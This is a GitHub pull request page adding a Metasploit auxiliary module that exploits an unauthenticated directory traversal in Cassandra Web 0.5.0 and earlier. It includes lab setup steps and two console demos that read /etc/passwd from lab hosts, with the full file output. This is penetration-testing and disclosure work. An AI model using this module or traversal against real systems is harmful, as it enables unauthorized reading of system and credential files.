Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Cassandra Web file read auxiliary module #16851

Merged
merged 2 commits into from
Aug 5, 2022
Merged

Add Cassandra Web file read auxiliary module #16851

merged 2 commits into from
Aug 5, 2022

Conversation

krastanoel
Copy link
Contributor

This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web
'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
This vulnerability occurred due to the disabled Rack::Protection module.

Debian Installation

apt install ruby-full -y
gem install cassandra-web
cat << EOF > /etc/apt/sources.list.d/cassandra.list
deb https://www.apache.org/dist/cassandra/debian 311x main
EOF
cat << EOF > /etc/apt/sources.list.d/adoptopenjdk.list
deb https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/ buster main
EOF
wget -q -O - https://www.apache.org/dist/cassandra/KEYS | apt-key add -
wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | apt-key add -
apt update && apt install adoptopenjdk-8-hotspot cassandra -y

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/scanner/http/cassandra_web_file_read.rb
  • set RHOSTS [ips]
  • Verify the target file successfully downloaded

Demo

Cassandra Web 0.5.0 Linux Debian 10.11

msf6 > use auxiliary/scanner/http/cassandra_web_file_read
msf6 auxiliary(scanner/http/cassandra_web_file_read) > set RHOSTS 192.168.56.1
RHOSTS => 192.168.56.1
msf6 auxiliary(scanner/http/cassandra_web_file_read) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cassandra Web Detected
[*] Downloading file...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:107:115::/nonexistent:/usr/sbin/nologin
cassandra:x:108:116:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin


[+] File saved in: /home/git/.msf4/loot/20220802185716_default_192.168.56.1_cassandra.web.tr_160962.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@bwatters-r7 bwatters-r7 self-assigned this Aug 2, 2022
@bwatters-r7
Copy link
Contributor

Just in case for future travellers: You also have to install g++, but you'll find that out reading error messages....

Testing

msf6 > use auxiliary/scanner/http/cassandra_web_file_read 
msf6 auxiliary(scanner/http/cassandra_web_file_read) > show options

Module options (auxiliary/scanner/http/cassandra_web_file_read):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DEPTH     8                yes       Traversal Depth (to reach the root folder)
   FILEPATH  /etc/passwd      yes       The path to the file to read
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
                                        t
   RPORT     3000             yes       The Cassandra Web port (default: 3000)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   VHOST                      no        HTTP server virtual host

msf6 auxiliary(scanner/http/cassandra_web_file_read) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/cassandra_web_file_read) > set rhosts 10.5.134.164
rhosts => 10.5.134.164
msf6 auxiliary(scanner/http/cassandra_web_file_read) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cassandra Web Detected
[*] Downloading file...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pulse:x:110:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:112:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
colord:x:114:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:115:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:116:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:117:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
msfuser:x:1000:1000:msfuser,,,:/home/msfuser:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:118:125::/nonexistent:/usr/sbin/nologin
cassandra:x:119:126:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin


[+] File saved in: /home/tmoose/.msf4/loot/20220805130024_default_10.5.134.164_cassandra.web.tr_268538.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cassandra_web_file_read) >

@bwatters-r7 bwatters-r7 merged commit 74eff9f into rapid7:master Aug 5, 2022
@bwatters-r7
Copy link
Contributor

Release Notes

This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.

krastanoel added a commit to krastanoel/msf that referenced this pull request Aug 6, 2022
@krastanoel
Land rapid7/metasploit-framework#16851
4907440 
Add Cassandra Web file read auxiliary module
@jmartin-tech jmartin-tech added the rn-modules release notes for new or majorly enhanced modules label Aug 11, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@krastanoel @bwatters-r7 @jmartin-tech @gwillcox-r7